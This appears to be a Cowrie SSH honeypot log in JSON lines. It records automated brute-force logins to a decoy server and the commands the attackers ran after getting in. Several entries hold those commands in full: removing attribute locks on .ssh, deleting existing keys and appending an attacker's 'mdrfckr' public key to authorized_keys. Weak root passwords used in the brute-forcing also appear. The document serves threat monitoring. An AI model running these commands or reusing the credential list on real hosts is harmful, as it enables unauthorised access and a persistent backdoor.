{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:10:27.096502Z","src_ip":"212.227.235.229","session":"7e9ca4ba2862"}
{"eventid":"cowrie.session.connect","src_ip":"200.195.162.69","src_port":57456,"dst_ip":"1.2.3.4","dst_port":22,"session":"bee6bf95e2fd","protocol":"ssh","message":"New connection: 200.195.162.69:57456 (1.2.3.4:22) [session: bee6bf95e2fd]","sensor":"my-vps","timestamp":"2025-08-26T13:10:27.097915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:27.098545Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:10:27.304744Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:10:28.122530Z","src_ip":"212.227.235.229","session":"7e9ca4ba2862"}
{"eventid":"cowrie.login.success","username":"root","password":"System@2023","message":"login attempt [root/System@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:10:28.169184Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:10:29.203969Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.204631Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.205619Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.370281Z","src_ip":"212.227.235.229","session":"7e9ca4ba2862"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.412468Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55078,"dst_ip":"1.2.3.4","dst_port":22,"session":"be1aa5542b2d","protocol":"ssh","message":"New connection: 212.227.235.229:55078 (1.2.3.4:22) [session: be1aa5542b2d]","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.635367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.636173Z","src_ip":"212.227.235.229","session":"be1aa5542b2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:10:29.842834Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.843560Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:10:29.899398Z","src_ip":"212.227.235.229","session":"be1aa5542b2d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:10:30.051025Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:30.051886Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.session.connect","src_ip":"200.195.162.69","src_port":59380,"dst_ip":"1.2.3.4","dst_port":22,"session":"43bff7fe81e9","protocol":"ssh","message":"New connection: 200.195.162.69:59380 (1.2.3.4:22) [session: 43bff7fe81e9]","sensor":"my-vps","timestamp":"2025-08-26T13:10:30.255459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:30.256278Z","src_ip":"200.195.162.69","session":"43bff7fe81e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:10:30.461936Z","src_ip":"200.195.162.69","session":"43bff7fe81e9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:10:30.997228Z","src_ip":"212.227.235.229","session":"be1aa5542b2d"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:31.261967Z","src_ip":"212.227.235.229","session":"4e89b057f96a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:31.262839Z","src_ip":"212.227.235.229","session":"be1aa5542b2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:10:31.322405Z","src_ip":"200.195.162.69","session":"43bff7fe81e9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:32.531357Z","src_ip":"200.195.162.69","session":"43bff7fe81e9"}
{"eventid":"cowrie.session.connect","src_ip":"200.195.162.69","src_port":60232,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bde8a13069a","protocol":"ssh","message":"New connection: 200.195.162.69:60232 (1.2.3.4:22) [session: 2bde8a13069a]","sensor":"my-vps","timestamp":"2025-08-26T13:10:33.760573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:10:33.761218Z","src_ip":"200.195.162.69","session":"2bde8a13069a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:10:33.964943Z","src_ip":"200.195.162.69","session":"2bde8a13069a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:10:34.819052Z","src_ip":"200.195.162.69","session":"2bde8a13069a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:35.023558Z","src_ip":"200.195.162.69","session":"2bde8a13069a"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:10:35.024670Z","src_ip":"200.195.162.69","session":"bee6bf95e2fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39576,"dst_ip":"1.2.3.4","dst_port":22,"session":"013717cd42bb","protocol":"ssh","message":"New connection: 212.227.235.229:39576 (1.2.3.4:22) [session: 013717cd42bb]","sensor":"my-vps","timestamp":"2025-08-26T13:11:06.944027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:11:06.944917Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:11:07.186154Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Zp123456","message":"login attempt [root/Zp123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:11:08.191226Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:11:08.766996Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:11:08.768062Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:11:08.769509Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:09.012127Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:11:09.551390Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:11:09.552059Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:11:09.795945Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:09.796843Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42130,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8b764749635","protocol":"ssh","message":"New connection: 212.227.235.229:42130 (1.2.3.4:22) [session: f8b764749635]","sensor":"my-vps","timestamp":"2025-08-26T13:11:10.042402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:11:10.043067Z","src_ip":"212.227.235.229","session":"f8b764749635"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:11:10.287148Z","src_ip":"212.227.235.229","session":"f8b764749635"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:11:11.305732Z","src_ip":"212.227.235.229","session":"f8b764749635"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:12.552215Z","src_ip":"212.227.235.229","session":"f8b764749635"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44092,"dst_ip":"1.2.3.4","dst_port":22,"session":"a508f01dd945","protocol":"ssh","message":"New connection: 212.227.235.229:44092 (1.2.3.4:22) [session: a508f01dd945]","sensor":"my-vps","timestamp":"2025-08-26T13:11:12.790247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:11:12.791065Z","src_ip":"212.227.235.229","session":"a508f01dd945"}
